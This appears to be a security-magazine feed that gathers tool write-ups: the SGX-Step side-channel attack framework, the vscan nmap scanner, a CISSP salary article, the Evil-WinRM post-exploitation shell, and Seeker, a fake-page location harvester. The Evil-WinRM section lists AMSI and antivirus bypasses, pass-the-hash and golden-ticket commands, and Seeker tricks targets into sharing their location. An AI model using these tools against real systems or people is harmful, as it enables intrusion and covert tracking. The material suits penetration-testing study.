
Sgx-Step - A Practical Attack Framework For Precise Enclave Execution Control


SGX-Step is an open-source framework to facilitate side-channel attack research on Intel SGX platforms. SGX-Step consists of an adversarial Linux kernel driver and a user-space library that allow an attacker to configure untrusted page table entries and/or x86 APIC timer interrupts entirely from user space. Our research results have demonstrated several new and improved enclaved execution attacks that gather side-channel observations at a maximal temporal resolution (i.e., by interrupting the victim enclave after every single instruction).

License. SGX-Step is free software, licensed under GPLv3. The SGX-Step logo is derived from Eadweard Muybridge's iconic public domain "Sallie Gardner at a Gallop" photo series, which, like our enclave single-stepping goal, breaks down the galloping horse dynamics into a series of individual photo frames to reveal overall horse gait properties.

Abstract

Trusted execution environments such as Intel SGX hold the promise of protecting sensitive computations from a potentially compromised operating system. Recent research convincingly demonstrated, however, that SGX's strengthened adversary model also gives rise to a new class of powerful, low-noise side-channel attacks leveraging first-rate control over hardware. These attacks commonly rely on frequent enclave preemptions to obtain fine-grained side-channel observations. A maximal temporal resolution is achieved when the victim state is measured after every instruction. Current state-of-the-art enclave execution control schemes, however, do not generally achieve such instruction-level granularity.

This paper presents SGX-Step, an open-source Linux kernel framework that allows an untrusted host process to configure APIC timer interrupts and track page table entries directly from user space. We contribute and evaluate an improved approach to single-step enclaved execution at instruction-level granularity, and we show how SGX-Step enables several new or improved attacks. Finally, we discuss its implications for the design of effective defense mechanisms.

Jo Van Bulck, Frank Piessens, and Raoul Strackx. 2017. SGX-Step: A Practical Attack Framework for Precise Enclave Execution Control. In Proceedings of the 2nd Workshop on System Software for Trusted Execution (SysTEX '17).

Overview

Crucial to the design of SGX-Step, as opposed to previous enclave preemption proposals, is the creation of user-space virtual memory mappings for physical memory locations holding page table entries, as well as for the local APIC memory-mapped I/O configuration registers and the x86 Interrupt Descriptor Table (IDT). This allows an untrusted, attacker-controlled host process to easily (i) track or modify enclave page table entries, (ii) configure the APIC timer one-shot/periodic interrupt source, (iii) trigger inter-processor interrupts, and (iv) register custom interrupt handlers completely within user space.

The above figure summarizes the sequence of hardware and software steps when interrupting and resuming an SGX enclave through our framework.

  1. The local APIC timer interrupt arrives within an enclaved instruction.
  2. The processor executes the AEX procedure that securely stores execution context in the enclave’s SSA frame, initializes CPU registers, and vectors to the (user space) interrupt handler registered in the IDT.
  3. At this point, any attack-specific, spy code can easily be plugged in.
  4. The library returns to the user space AEP trampoline. We modified the untrusted runtime of the official SGX SDK to allow easy registration of a custom AEP stub. Furthermore, to enable precise evaluation of our approach on attacker-controlled benchmark debug enclaves, SGX-Step can optionally be instrumented to retrieve the stored instruction pointer from the interrupted enclave’s SSA frame. For this, our /dev/sgx-step driver offers an optional IOCTL call for the privileged EDBGRD instruction.
  5. Thereafter, we configure the local APIC timer for the next interrupt by writing into the initial-count MMIO register, just before executing (6) ERESUME.

Building and Running

0. System Requirements

SGX-Step requires an SGX-capable Intel processor, and an off-the-shelf Linux kernel. Our evaluation was performed on i7-6500U/6700 CPUs, running Ubuntu 16.04 with a stock Linux 4.15.0 kernel. We summarize Linux kernel parameters below.

Linux kernel parameter        | Motivation
nox2apic                      | Configure local APIC device in memory-mapped I/O mode (to make use of SGX-Step's precise single-stepping features).
iomem=relaxed, no_timer_check | Suppress unneeded warning messages in the kernel logs.
isolcpus=1                    | Affinitize the victim process to an isolated CPU core.
dis_ucode_ldr                 | Disable CPU microcode updates (Foreshadow/L1TF mitigations may affect single-stepping interval).

Pass the desired boot parameters to the kernel as follows:

$ sudo vim /etc/default/grub
 # GRUB_CMDLINE_LINUX_DEFAULT="quiet splash nox2apic iomem=relaxed no_timer_check isolcpus=1" 
$ sudo update-grub && sudo reboot

Finally, in order to reproduce our experimental results, make sure to disable C-States and SpeedStep technology in the BIOS configuration. The table below lists currently supported Intel CPUs, together with their single-stepping APIC timer interval (libsgxstep/config.h).

Model name   | CPU      | Base frequency | APIC timer interval
Skylake      | i7-6700  | 3.4 GHz        | 19
Skylake      | i7-6500U | 2.5 GHz        | 25
Skylake      | i5-6200U | 2.3 GHz        | 28
Kaby Lake R  | i7-8650U | 1.9 GHz        | 34
Coffee Lake R | i9-9900K | 3.6 GHz       | 21

1. Patch and install SGX SDK

To enable easy registration of a custom Asynchronous Exit Pointer (AEP) stub, we modified the untrusted runtime of the official Intel SGX SDK. Proceed as follows to checkout linux-sgx v2.6 and apply our patches.

$ git submodule init 
$ git submodule update 
$ ./install_SGX_driver.sh # tested on Ubuntu 16.04 
$ ./patch_sdk.sh 
$ ./install_SGX_SDK.sh # tested on Ubuntu 16.04

The above install scripts are tested on Ubuntu 16.04 LTS. For other GNU/Linux distributions, please follow the instructions in the linux-sgx project to build and install the Intel SGX SDK and PSW packages. You will also need to build and load an (unmodified) linux-sgx-driver SGX kernel module in order to use SGX-Step.

Note (local installation). The patched SGX SDK and PSW packages can be installed locally, without affecting a compatible system-wide 'linux-sgx' installation. For this, the example Makefiles support an SGX_SDK environment variable that points to the local SDK installation directory. When detecting a non-default SDK path (i.e., not /opt/intel/sgxsdk), the "run" Makefile targets furthermore dynamically link against the patched libsgx_urts.so untrusted runtime built in the local linux-sgx directory (using the LD_LIBRARY_PATH environment variable).

Note (32-bit support). Instructions for building 32-bit versions of the SGX SDK and SGX-Step can be found in README-m32.md.

2. Build and load /dev/sgx-step

SGX-Step comes with a loadable kernel module that exports an IOCTL interface to the libsgxstep user-space library. The driver is mainly responsible for (i) hooking the APIC timer interrupt handler, (ii) collecting untrusted page table mappings, and optionally (iii) fetching the interrupted instruction pointer for benchmark enclaves.
To build and load the /dev/sgx-step driver, execute:

$ cd kernel 
$ make clean load

Note (/dev/isgx). Our driver uses some internal symbols and data structures from the official Intel /dev/isgx driver. We therefore include a git submodule that points to an unmodified v2.1 linux-sgx-driver.
Note (/dev/mem). We rely on Linux's virtual /dev/mem device to construct user-level virtual memory mappings for APIC physical memory-mapped I/O registers and page table entries of interest. Recent Linux distributions typically enable the CONFIG_STRICT_DEVMEM option, however, which prevents such use. Our /dev/sgx-step driver therefore includes an approach to bypass devmem_is_allowed checks, without having to recompile the kernel.
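As an added example (not part of the SGX-Step project), the following script audits a host for the boot-time settings described in the kernel parameter table above and in the /dev/mem note: it parses the kernel command line for those parameters, reads CONFIG_STRICT_DEVMEM from the kernel config, and checks whether the /dev/sgx-step node exists. The function names, severity labels and sample inputs are this example's own.

```python
"""Audit a Linux host for the boot-time settings SGX-Step depends on.

Added example, not SGX-Step code. Severity labels and samples are this
example's own assessment.
"""
import os
import platform
import re
import shlex
from typing import Dict, List, Optional

# Parameters from the README's kernel-parameter table. "high" ones weaken
# platform protections by themselves; "low" ones matter only in combination.
WATCHED_PARAMS = {
    "nox2apic": ("high", "local APIC forced into MMIO mode (user-space timer control)"),
    "iomem=relaxed": ("high", "relaxes /dev/mem access to I/O memory such as APIC registers"),
    "dis_ucode_ldr": ("high", "microcode updates disabled; Foreshadow/L1TF fixes may be missing"),
    "isolcpus": ("low", "CPU core isolation; benign alone, part of the SGX-Step recipe"),
    "no_timer_check": ("low", "suppresses timer warnings; benign alone"),
}


def parse_cmdline(cmdline: str) -> Dict[str, Optional[str]]:
    """Split a /proc/cmdline string into {param: value or None}.

    Values may contain commas (isolcpus=1,2); quoted values are kept whole.
    """
    params: Dict[str, Optional[str]] = {}
    for token in shlex.split(cmdline):
        key, sep, value = token.partition("=")
        params[key] = value if sep else None
    return params


def audit_cmdline(cmdline: str) -> List[dict]:
    """One finding per watched parameter found on the command line."""
    params = parse_cmdline(cmdline)
    findings = []
    for watched, (severity, why) in WATCHED_PARAMS.items():
        key, _, wanted = watched.partition("=")
        if key not in params:
            continue
        if wanted and params[key] != wanted:
            continue  # e.g. iomem=strict is the safe default, not a finding
        findings.append({"param": watched, "value": params[key],
                         "severity": severity, "why": why})
    return findings


def strict_devmem_enabled(kernel_config: str) -> Optional[bool]:
    """Read CONFIG_STRICT_DEVMEM from /boot/config-* text; None if absent.

    Per the README the sgx-step driver bypasses devmem_is_allowed() once
    loaded, so "y" only stops /dev/mem abuse without the driver installed.
    """
    if re.search(r"^CONFIG_STRICT_DEVMEM=y$", kernel_config, re.M):
        return True
    if re.search(r"^(CONFIG_STRICT_DEVMEM=n|# CONFIG_STRICT_DEVMEM is not set)$",
                 kernel_config, re.M):
        return False
    return None


def sgx_step_device_present(dev_entries) -> bool:
    """True if the /dev/sgx-step node from the README appears in a /dev listing."""
    return "sgx-step" in set(dev_entries)


def assess(cmdline: str, kernel_config: str, dev_entries) -> dict:
    """Combine the three checks into one report with an overall level."""
    findings = audit_cmdline(cmdline)
    present = sgx_step_device_present(dev_entries)
    if present:
        level = "driver-loaded"   # the attack driver itself is installed
    elif any(f["severity"] == "high" for f in findings):
        level = "high"
    elif findings:
        level = "low"
    else:
        level = "clean"
    return {"level": level, "findings": findings,
            "strict_devmem": strict_devmem_enabled(kernel_config),
            "sgx_step_device": present}


# Constructed sample inputs mirroring the README's recommended GRUB line.
SAMPLE_CMDLINE = ("BOOT_IMAGE=/vmlinuz-placeholder root=/dev/sda1 ro quiet splash "
                  "nox2apic iomem=relaxed no_timer_check isolcpus=1 dis_ucode_ldr")
SAMPLE_CONFIG = "CONFIG_DEVMEM=y\nCONFIG_STRICT_DEVMEM=y\n"

if __name__ == "__main__":
    # Read the live host where possible, otherwise fall back to the samples.
    try:
        cmdline = open("/proc/cmdline").read()
        config = open("/boot/config-" + platform.release()).read()
    except OSError:
        cmdline, config = SAMPLE_CMDLINE, SAMPLE_CONFIG
    devs = os.listdir("/dev") if os.path.isdir("/dev") else []
    report = assess(cmdline, config, devs)
    print("level:", report["level"], "| CONFIG_STRICT_DEVMEM:", report["strict_devmem"])
    for f in report["findings"]:
        print(f"  [{f['severity']}] {f['param']}={f['value']}: {f['why']}")
```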

3. Build and run test applications

User-space applications can link to the libsgxstep library to make use of SGX-Step's single-stepping and page table manipulation features. Have a look at the example applications in the "app" directory. For example, to build and run the strlen attack from the paper for a benchmark enclave that processes the secret string 100 repeated times, execute:

$ cd app/bench 
$ NUM=100 STRLEN=1 make parse # alternatively vary NUM and use BENCH=1 or ZIGZAG=1 
$ # (above command defaults to the Dell Inspiron 13 7359 evaluation laptop machine; 
$ # use DESKTOP=1 to build for a Dell Optiplex 7040 machine) 
$ # use SGX_SDK=/home/jo/sgxsdk/ for a local SDK installation 
$ # use M32=1 to produce a 32-bit executable

The above command builds libsgxstep, the benchmark victim enclave, and the untrusted attacker host process, where the attack scenario and instance size are configured via the corresponding environment variables. The same command also runs the resulting binary non-interactively (to ensure deterministic timer intervals), and finally calls an attack-specific post-processing Python script to parse the resulting enclave instruction pointer benchmark results.

Note (performance). Single-stepping enclaved execution incurs a substantial slowdown. We measured execution times of up to 15 minutes for the experiments described in the paper. SGX-Step's page table manipulation features allow single-stepping to be initiated for selected functions only, for instance by revoking access rights on specific code or data pages of interest.

Note (timer interval). The exact timer interval value depends on CPU frequency, and hence remains inherently platform-specific. Configure a suitable value in /app/bench/main.c. We established precise timer intervals for our evaluation platforms (see table above) by tweaking and observing the NOP microbenchmark enclave instruction pointer trace results.

Using SGX-Step in your own projects

The easiest way to get started using the SGX-Step framework in your own projects is through git submodules:

$ cd my/git/project 
$ git submodule add git@github.com:jovanbulck/sgx-step.git 
$ cd sgx-step # Now build `/dev/sgx-step` and `libsgxstep` as described above

Have a look at the Makefiles in the app directory to see how a client application can link to libsgxstep plus any local SGX SDK/PSW packages.


Download the tool: https://github.com/jovanbulck/sgx-step

The post Sgx-Step - A Practical Attack Framework For Precise Enclave Execution Control appeared first on Hakin9 - IT Security Magazine.


Vscan - Vulnerability Scanner Tool Using Nmap And Nse Scripts


Vscan adds value to vulnerability scanning with nmap by using NSE scripts, which add flexibility in vulnerability detection and exploitation. Some of the features that NSE scripts provide:

  • Network discovery
  • More sophisticated version detection
  • Vulnerability detection
  • Backdoor detection
  • Vulnerability exploitation

nmap (“Network Mapper”) is an open source tool for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine to scan single hosts. nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. While nmap is commonly used for security audits, many systems and network administrators find it useful for routine tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.

The Nmap Scripting Engine (NSE) is one of Nmap’s most powerful and flexible features. It allows users to write (and share) simple scripts to automate a wide variety of networking tasks. Those scripts are then executed in parallel with the speed and efficiency you expect from Nmap. Users can rely on the growing and diverse set of scripts distributed with Nmap, or write their own to meet customer needs.

This tool uses the path /usr/share/nmap/scripts/ where the nse scripts are located in kali linux.

The tool performs the following:

  • checks that the target hosts are reachable using ICMP requests
  • takes as input a protocol name such as http and executes all NSE scripts related to that protocol
  • if any vulnerability is detected, saves the output into a log file
  • can perform all of the above actions for a range of IP addresses

If the tool finds a vulnerability in a certain protocol (e.g. http), it keeps the output in a log file created at the following location: /home/vulnerabilities_enumeration/http_vulnerabilities/http_vulnerabilities/http_vulnerabilities.txt. In this example the folders are named using the protocol prefix, which in this case is http.
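The following is an added example (not vscan's own code) of the tool's selection and logging steps: it picks the NSE scripts that match a protocol prefix, parses nmap's vuln-style output for "State:" lines, and builds the log path described above. The function names and the sample nmap output are constructed for this example.

```python
"""Triage nmap NSE output into structured findings, as vscan's log step does.

Added example, not part of the vscan project. Function names and the
sample nmap output are constructed for illustration.
"""
import re
from pathlib import Path
from typing import Dict, Iterable, List

NSE_DIR = "/usr/share/nmap/scripts"   # NSE script location on Kali, per the page
HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+/(?:tcp|udp))\s+open\b")
SCRIPT_RE = re.compile(r"^\|[_ ]([a-z0-9][\w.-]*):")   # "| name:" or "|_name:"
STATE_RE = re.compile(r"^State:\s*(.+)$")


def select_scripts(protocol: str, script_files: Iterable[str]) -> List[str]:
    """All NSE scripts whose name starts with the protocol prefix (e.g. http-)."""
    prefix = protocol.lower() + "-"
    return sorted(f[:-4] for f in script_files
                  if f.endswith(".nse") and f.lower().startswith(prefix))


def parse_nse_findings(nmap_output: str) -> List[Dict[str, str]]:
    """Extract host, port, script, title and state for every vulnerable result.

    nmap's vulns library prints a "VULNERABLE:" (or "NOT VULNERABLE:") header,
    the vulnerability title on the next line, then a "State: ..." line. Only
    states other than "NOT VULNERABLE" become findings.
    """
    findings: List[Dict[str, str]] = []
    host = port = script = title = None
    expect_title = False
    for raw in nmap_output.splitlines():
        line = raw.rstrip()
        m = HOST_RE.match(line)
        if m:
            host, port, script = m.group(1), None, None
            continue
        m = PORT_RE.match(line)
        if m:
            port, script = m.group(1), None
            continue
        m = SCRIPT_RE.match(line)
        if m:
            script, title, expect_title = m.group(1), None, False
            continue
        if not line.startswith("|"):
            continue
        body = line[2:].strip()          # drop the "| " or "|_" prefix
        if body.endswith("VULNERABLE:"):
            expect_title = True
        elif expect_title:
            title, expect_title = body, False
        else:
            m = STATE_RE.match(body)
            if m and "NOT VULNERABLE" not in m.group(1) and host and script:
                findings.append({"host": host, "port": port or "", "script": script,
                                 "title": title or "", "state": m.group(1)})
    return findings


def log_path(protocol: str, base: str = "/home/vulnerabilities_enumeration") -> Path:
    """The log location the page describes, e.g. .../http_vulnerabilities.txt."""
    d = f"{protocol}_vulnerabilities"
    return Path(base) / d / d / f"{d}.txt"


def format_log_lines(findings: List[Dict[str, str]]) -> List[str]:
    """One log line per finding."""
    return [f"{f['host']} {f['port']} {f['script']} [{f['state']}] {f['title']}"
            for f in findings]


# Constructed sample: one host likely vulnerable, one not, plus an unrelated script.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.162.90
Host is up (0.0012s latency).

PORT   STATE SERVICE
80/tcp open  http
|_http-title: Welcome
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     Description:
|       Slowloris tries to keep many connections to the target web server open
|_      and hold them open as long as possible.

Nmap scan report for 192.168.162.91
Host is up (0.0020s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-slowloris-check:
|   NOT VULNERABLE:
|   Slowloris DOS attack
|_    State: NOT VULNERABLE
"""

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_NMAP_OUTPUT
    for entry in format_log_lines(parse_nse_findings(text)):
        print(entry)
    print("would log to:", log_path("http"))
```

Note that selecting every script with a protocol prefix also pulls in scripts from the dos and exploit NSE categories (http-slowloris-check is a dos-category check), so review the selected list before running it against production hosts.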

Usage:

[Usage:] ./vscan.sh <ip_range> <protocol> <port> <Pn (optional)>

[Usage:] ./vscan.sh <ips_file> <protocol> <port> <Pn (optional)>

[Usage:] ./vscan.sh <ip> <protocol> <port> <Pn (optional)>

How to run:

./vscan.sh 192.168.162.90 http 80

./vscan.sh 192.168.162.10-90 http 80

./vscan.sh 192.168.162.90 ssh 22 Pn

./vscan.sh IPs.txt smb 445

References:

Screenshots

Example: SMB scanning

Example: Slowloris vulnerability detection

Example: multiple IP scanning SSH weak keys

Example: When the system is down or no ICMP requests


Download tool and support author: https://github.com/xvass/vscan


The Salary You Can Earn as CISSP Certified Professional by Sai Digbijay Patnaik


The cost of living is only increasing year after year. Naturally, you would prefer your income to increase too, in alignment with your expenditure. This is possible only when you are in a good job. You are probably already in the IT field and earning well. Regardless, if you decide to step into the arena of cybersecurity, you will not regret it. In fact, you will have even less reason for regret should you enter with a Certified Information Systems Security Professional (CISSP) certificate in hand!

An Introduction to CISSP

CISSP is one of the several certifications offered to IT professionals. However, many organizations deem it the best certification for people seeking jobs in the arena of cybersecurity. This is because the International Information Systems Security Certification Consortium (ISC2) developed it. Furthermore, it is in alignment with the benchmark set by the International Organization for Standardization and International Electrotechnical Commission (IEC/ISO). This benchmark is Standard 17024. Every IT company across the globe recognizes and appreciates CISSP certification.

This certification will improve your knowledge and skills in eight broad areas. They are – 

  • Identity and access management or IAM
  • Security operations
  • Software development security
  • Asset security
  • Security architecture and engineering
  • Security assessment and testing
  • Communications and network security
  • Security and risk management

Once you have gone through the course, you are bound to have more confidence in your abilities to manage security operations. With hackers all over the virtual world, this is a major area of concern in every business establishment. However, with you at the helm of affairs, no one needs to worry. The design and architecture of your security programs are perfect. You manage them perfectly too! Any employer who hires you will commend you for being so vigilant!

Applying for the CISSP Certification Course

There are several establishments offering this certification course. However, if you wish to gain full advantage of the CISSP certification, you should seek a good institute. Is it easy to apply for CISSP certification? No, indeed, you have to fulfill certain requisites. For instance, you must display five years of cumulative work experience. Then again, you should have worked full time and been paid a regular salary. Thirdly, the work experience should have covered two domains included in the CISSP Common Book of Knowledge.

There are diverse ways of fulfilling these requirements. For example, you may opt for a degree spanning four years of relevant study. Alternatively, you may peruse the ISC2 approved list of CISSP credentials. There are regional equivalents of these credentials. You may opt for a suitable equivalent. This will grant you comparable work experience of one year. Another method is to get through the basic CISSP examination. Once you get through, you can become an Associate of ISC2. As an Associate, you will have six years to gain five years of work experience.

Obtaining the CISSP Certification

If you have the necessary requisites, then you may apply for CISSP certification. You will have access to study guides and practice books. You may even prepare for the final examination via practice tests. At the same time, you may prefer face-to-face training at a recognized institution, one of which we mentioned above. Of course, you will have to pay for your training. However, the course will be well worth your money and time.

Once you are ready, you will have to sit for a certification examination. It lasts for about three hours. The range of questions covers all eight domains. True, it is tough. However, the gain is immense if you pass the exam. You present yourself as an authority on crucial security issues and an expert on cybersecurity!

You may enjoy the fruits of certification for three years. After this period, you will have to go in for recertification. This means that you will have to display CPE credits. CPE refers to continuing professional education. Towards this end, you must strive to attend as many conferences as possible. If there are any training courses that will help you, do not hesitate to sign up. Learn as much as you can from webinars. Keep in touch with specialized media via your reading habits. This way, you will even be able to stay in touch with the latest trends in cybersecurity. In short, you will have to do something novel all the time. Apart from this, you will have to shell out a yearly membership fee too.

Getting a Huge Salary

The arena of cybersecurity is a lucrative one indeed! If you should decide to enter it, you may boast of earning one of the highest salaries in the world! The ordinary IT professional cannot even compare with you. There is always a difference between the wages of the ordinary individual and the expert. The percentage of difference varies for diverse places. They include African nations, Europe, the Asia-Pacific region, the Middle East, Latin America, and North America. 

Now imagine yourself gaining CISSP certification. You have it made for the rest of your life! Every IT professional will envy you! Your salary is the third-highest amongst all global salaries! Since it varies with experience and designations, it is not possible to list out exact figures. Rest assured, however, that the annual income runs into huge sums. In the U.S. alone, pay for CISSP certified individuals remains in the top 10 on the salary chart. In fact, it has been so for the past few years. It is no wonder then that so many IT professionals worldwide are keen to pursue CISSP certification. 

To conclude, opt for a cybersecurity certification whenever you get the chance to do so. Then again, select CISSP first. You are welcome to add other certifications later. Wherever you go, organizations will be keen to hire you. They believe that a CISSP-certified professional is the best person to handle vital issues relating to security.


About the Author:

Sai Digbijay is a content specialist for Cyber Security courses at Simplilearn. He writes about a range of topics that include data science, project management, cloud computing, and marketing. He values curious minds and scrambles to learn new things.

Evil-WinRM: The ultimate WinRM shell for hacking/pentesting


Description & Purpose

This shell is the ultimate WinRM shell for hacking/pentesting.

WinRM (Windows Remote Management) is the Microsoft implementation of the WS-Management Protocol, a standard SOAP-based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their operating systems in order to make life easier for system administrators.

This program can be used on any Microsoft Windows server with this feature enabled (usually on port 5985), of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used for legitimate purposes by system administrators as well, but most of its features are focused on hacking/pentesting.

Features

  • Load in memory Powershell scripts
  • Load in memory dll files bypassing some AVs
  • Load in memory C# (C Sharp) assemblies bypassing some AVs
  • Load x64 payloads generated with awesome donut technique
  • AMSI Bypass
  • Pass-the-hash support
  • Kerberos auth support
  • SSL and certificates support
  • Upload and download files
  • List remote machine services without privileges
  • Command History
  • WinRM command completion
  • Local files completion
  • Colorization on output messages (can be disabled optionally)
  • Docker support (prebuilt images available at Dockerhub)

Help

Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] 
[-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] 
-S, --ssl                      Enable ssl 
-c, --pub-key                  PUBLIC_KEY_PATH Local path to public key certificate 
-k, --priv-key                 PRIVATE_KEY_PATH Local path to private key certificate 
-r, --realm                    DOMAIN Kerberos auth, it has to be set also in /etc/krb5.conf file using this format -> CONTOSO.COM = { kdc = fooserver.contoso.com } 
-s, --scripts                  PS_SCRIPTS_PATH Powershell scripts local path 
-e, --executables              EXES_PATH C# executables local path 
-i, --ip IP                    Remote host IP or hostname (required) 
-U, --url URL                  Remote url endpoint (default wsman) 
-u, --user                     USER Username (required if not using kerberos) 
-p, --password PASS            Password 
-H, --hash NTHash              NTHash 
-P, --port PORT                Remote host port (default 5985) 
-V, --version                  Show version 
-h, --help                     Display this help message

Requirements

Ruby 2.3 or higher is needed. Some ruby gems are needed as well: winrm >=2.3.2, winrm-fs >=1.3.2, stringio >=0.0.2 and colorize >=0.8.1. Depending on your installation method (three are available), you may have to install them manually.

Another important requirement, used only for Kerberos auth, is the Kerberos package used for network authentication. On Debian-based distributions (Kali, Parrot, etc.) it is called krb5-user. On BlackArch it is called krb5, and it may be named differently on other Linux distributions.

Installation & Quick Start (4 methods)

Method 1. Installation directly as ruby gem (dependencies will be installed automatically on your system)

  • Step 1. Install it (it will install automatically dependencies): gem install evil-winrm
  • Step 2. Ready. Just launch it! ~$ evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

Method 2. Git clone and install dependencies on your system manually

  • Step 1. Install dependencies manually: ~$ sudo gem install winrm winrm-fs colorize stringio
  • Step 2. Clone the repo: git clone https://github.com/Hackplayers/evil-winrm.git
  • Step 3. Ready. Just launch it! ~$ cd evil-winrm && ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

Method 3. Using bundler (dependencies will not be installed on your system, just to use evil-winrm)

  • Step 1. Install bundler: gem install bundler:2.0.2
  • Step 2. Install dependencies with bundler: cd evil-winrm && bundle install --path vendor/bundle
  • Step 3. Launch it with bundler: bundle exec evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

Method 4. Using Docker

  • Step 1. Launch docker container based on already built image: docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/ps1_scripts/' -e '/exe_files/'

Documentation

Clear text password

If you don't want to put the password in clear text, you can omit the -p argument and the password will be prompted for without being echoed.

Ipv6

To use IPv6, the address must be added to /etc/hosts. Just put the already set name of the host after -i argument instead of an IP address.

Basic commands

  • upload: local files can be auto-completed using tab key.
    • usage: upload local_filename or upload local_filename destination_filename
  • download:
    • usage: download remote_filename or download remote_filename destination_filename

Notes about paths (upload/download): Relative paths are not allowed on download/upload. Use filenames in the current directory or absolute paths. If you are using Evil-WinRM in a Docker environment, bear in mind that all local paths should be under /data, and make sure that you mapped it as a volume in order to be able to access downloaded files or to upload files from your local host OS.

  • services: list all services. No administrator permissions needed.
  • menu: load the Invoke-Binary, l04d3r-LoadDll, Donut-Loader and Bypass-4MSI functions that we will explain below. When a ps1 is loaded all its functions will be shown up.

Load powershell scripts

  • To load a ps1 file you just have to type the name (auto-completion using tab allowed). The scripts must be in the path set at the -s argument. Type menu again to see the loaded functions. Very large files can take a long time to be loaded.

Advanced commands

  • Invoke-Binary: allows exes compiled from c# to be executed in memory. The name can be auto-completed using tab key and allows up to 3 parameters. The executables must be in the path set at -e argument.

  • l04d3r-LoadDll: allows loading dll libraries in memory, it is equivalent to: [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("pwn.dll"))

The dll file can be hosted by smb, http or locally. Once it is loaded type menu, then it is possible to autocomplete all functions.

  • Donut-Loader: allows injecting x64 payloads generated with the awesome donut technique. No need to encode the payload.bin, just generate and inject!

You can use this donut-maker to generate the payload.bin if you don't use Windows. This script uses a python module written by Marcello Salvati (byt3bl33d3r). It can be installed using pip:

pip3 install donut-shellcode

  • Bypass-4MSI: patches AMSI protection.

Kerberos

  • First you have to sync the date with the DC: rdate -n <dc_ip>
  • To generate a ticket there are many ways:
    • Using ticketer.py from impacket:
      ticketer.py -dc-ip <dc_ip> -nthash <krbtgt_nthash> -domain-sid <domain_sid> -domain <domain_name> <user>
    • If you get a kirbi ticket using Rubeus or Mimikatz you have to convert it to ccache using ticket_converter.py:
      python ticket_converter.py ticket.kirbi ticket.ccache
  • Add the ccache ticket. There are 2 ways:
      export KRB5CCNAME=/foo/var/ticket.ccache
      cp ticket.ccache /tmp/krb5cc_0
  • Add the realm to /etc/krb5.conf (for Linux). Use of this format is important:
CONTOSO.COM = {
            kdc = fooserver.contoso.com
}

  • Check Kerberos tickets with klist
  • To remove ticket use: kdestroy
  • For more information about Kerberos check this cheatsheet

Extra features

  • To disable colors just modify on code this variable $colors_enabled. Set it to false: $colors_enabled = false

Changelog:

Changelog and project changes can be checked here: CHANGELOG.md

Credits:

Main author:

Collaborators, developers, documenters, testers and supporters:

Hat tip to:

  • Alamot for his original code.
  • 3v4Si0N for his awesome dll loader.
  • WinRb All contributors of ruby library.
  • TheWover for his awesome donut tool.
  • byt3bl33d3r for his python library to create donut payloads.
  • Sh11td0wn for inspiration about new features.

Download tool: https://github.com/Hackplayers/evil-winrm


Seeker - Accurately Locate Smartphones using Social Engineering


The concept behind Seeker is simple: just as phishing pages are hosted to get credentials, why not host a fake page that requests your location, like many popular location-based websites do.

Seeker hosts a fake website on the built-in PHP server and uses Serveo to generate a link which we forward to the target. The website asks for location permission and, if the target allows it, we can get:

  • Longitude
  • Latitude
  • Accuracy
  • Altitude - Not always available
  • Direction - Only available if user is moving
  • Speed - Only available if user is moving

Along with Location Information we also get Device Information without any permissions :

  • Operating System
  • Platform
  • Number of CPU Cores
  • Amount of RAM - Approximate Results
  • Screen Resolution
  • GPU information
  • Browser Name and Version
  • Public IP Address
  • IP Address Reconnaissance

This tool is a Proof of Concept and is for Educational Purposes Only, Seeker shows what data a malicious website can gather about you and your devices and why you should not click on random links and allow critical permissions such as Location etc.

How is this Different from IP GeoLocation

  • Other tools and services offer IP geolocation, which is NOT accurate at all and does not give the location of the target; instead it is the approximate location of the ISP.
  • Seeker uses the browser's HTML geolocation API: it gets location permission and then grabs longitude and latitude using the GPS hardware present in the device, so Seeker works best with smartphones. If GPS hardware is not present, such as on a laptop, Seeker falls back to IP geolocation or looks for cached coordinates.
  • Generally, if a user accepts the location permission, the information received is accurate to approximately 30 meters; accuracy depends on the device.

Note : On iPhone due to some reason location accuracy is approximately 65 meters.

Tested On :

  • Kali Linux 2019.2
  • BlackArch Linux
  • Ubuntu 19.04
  • Kali Nethunter
  • Termux
  • Parrot OS

Installation

Kali Linux / Ubuntu / Parrot OS

git clone https://github.com/thewhiteh4t/seeker.git 
cd seeker/ 
chmod 777 install.sh 
./install.sh

BlackArch Linux

pacman -S seeker

Docker

# Install docker

curl -fsSL https://get.docker.com -o get-docker.sh
sh get-docker.sh

# Build Seeker

cd seeker/
docker build -t seeker .

# Launch seeker

docker run -t --rm seeker

# OR Pull from DockerHub

docker pull thewhiteh4t/seeker
docker run -t seeker

Termux

git clone https://github.com/thewhiteh4t/seeker.git
cd seeker/
chmod 777 termux_install.sh
./termux_install.sh

Usage

python3 seeker.py -h

usage: seeker.py [-h] [-s SUBDOMAIN]

